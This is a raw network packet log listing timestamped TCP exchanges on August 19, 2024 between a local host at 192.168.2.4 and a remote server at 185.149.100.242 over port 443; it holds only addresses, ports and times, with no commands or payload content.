Aug 19, 2024 09:28:46.545953989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.545974016 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.546175003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.546192884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.546226978 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.546238899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.546253920 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.546271086 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.571626902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.572866917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.572884083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.572942972 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.572954893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.572985888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.573005915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.593519926 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.630505085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.630521059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.630565882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.630574942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.630588055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.630605936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.630808115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.630825043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.630856037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.630861998 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.630875111 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.631975889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.631994963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.632101059 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.632107973 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.632145882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.632200956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.632216930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.632261038 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.632266045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.632282972 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.632301092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.632684946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.632694006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.632745028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.632756948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.632786989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.635282040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.637681961 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.637701988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.637749910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.637756109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.637789965 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.638015032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.638029099 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.638065100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.638071060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.638086081 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.638102055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.639643908 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.665508986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.665524006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.665581942 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.665591002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.665623903 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.670156002 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.723160982 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.723177910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.723233938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.723241091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.723272085 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.723335981 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.723354101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.723381996 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.723387003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.723412037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.723428011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.724455118 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.724471092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.724515915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.724523067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.724553108 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.724920034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.724940062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.724983931 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.724989891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.725023985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.725686073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.725703001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.725747108 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.725753069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.725783110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.726047039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.730372906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.730387926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.730454922 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.730460882 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.730498075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.730777979 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.730792999 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.730832100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.730838060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.730870008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.733959913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.764905930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.764921904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.764966011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.764974117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.764991045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.765005112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.815892935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.815917015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.815958977 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.815989017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.816003084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.816174030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.816198111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.816222906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.816231966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.816250086 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.816278934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.817138910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.817154884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.817207098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.817215919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.817246914 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.817444086 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.817461014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.817488909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.817495108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.817512989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.817529917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.818494081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.818511963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.818564892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.818572998 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.818603992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.819859982 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.822941065 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.822957039 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.823015928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.823021889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.823056936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.823622942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.823642969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.823721886 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.823728085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.823759079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.823827028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.857680082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.857696056 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.857783079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.857795000 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.857954025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.910444975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.910486937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.910526991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.910540104 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.910563946 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.910582066 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.910686016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.910702944 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.910731077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.910739899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.910762072 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.910778999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.911843061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.911868095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.911896944 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.911902905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.911925077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.911942005 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.912580013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.912601948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.912627935 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.912633896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.912656069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.912672043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.913594961 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.913611889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.913656950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.913662910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.913696051 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.914952993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.917515039 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.917535067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.917587042 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.917593956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.917624950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.917675972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.917694092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.917736053 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.917742014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.917773008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.919697046 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.950474024 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.950496912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.950567007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.950592041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.950740099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.003386974 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.003448963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.003508091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.003580093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.003616095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.003618002 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.003686905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.003699064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.003726006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.003763914 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.003808975 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.004640102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.004688978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.004728079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.004749060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.004772902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.004791975 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.005084991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.005139112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.005330086 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.005345106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.005395889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.006803036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.006851912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.007149935 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.007164955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.007210016 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.009792089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.010494947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.010559082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.010576963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.010591030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.010626078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.010646105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.010756016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.010802984 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.010834932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.010848999 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.010878086 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.010896921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.043229103 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.043303967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.043458939 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.043458939 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.043482065 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.044894934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.098793030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.098831892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.098905087 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.098925114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.098953962 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.098970890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.099196911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.099221945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.099247932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.099253893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.099278927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.099299908 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.100951910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.100975037 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.101013899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.101022005 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.101044893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.101063013 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.102230072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.102277994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.102292061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.102300882 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.102327108 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.102343082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.103992939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.104049921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.104069948 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.104078054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.104099989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.104115963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.105444908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.105490923 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.105514050 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.105521917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.105550051 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.105580091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.105637074 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.105683088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.105706930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.105712891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.105755091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.115130901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.136115074 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.136156082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.136356115 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.136357069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.136409998 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.136873960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.191822052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.191852093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.191911936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.191951036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.191965103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.192044020 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.192082882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.193803072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.193826914 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.193885088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.193929911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.193967104 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.194816113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.194843054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.194879055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.194896936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.194926977 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.196693897 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.196713924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.196783066 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.196815968 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.197603941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.197628021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.197669029 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.197699070 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.197734118 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.197846889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.197863102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.197896957 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.197913885 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.197942019 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.228607893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.228636980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.228739977 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.228813887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.228893042 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.278570890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.284387112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.284400940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.284436941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.284461021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.284497023 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.284498930 CEST	49759	443	192.168.2.4	185.149.100.242
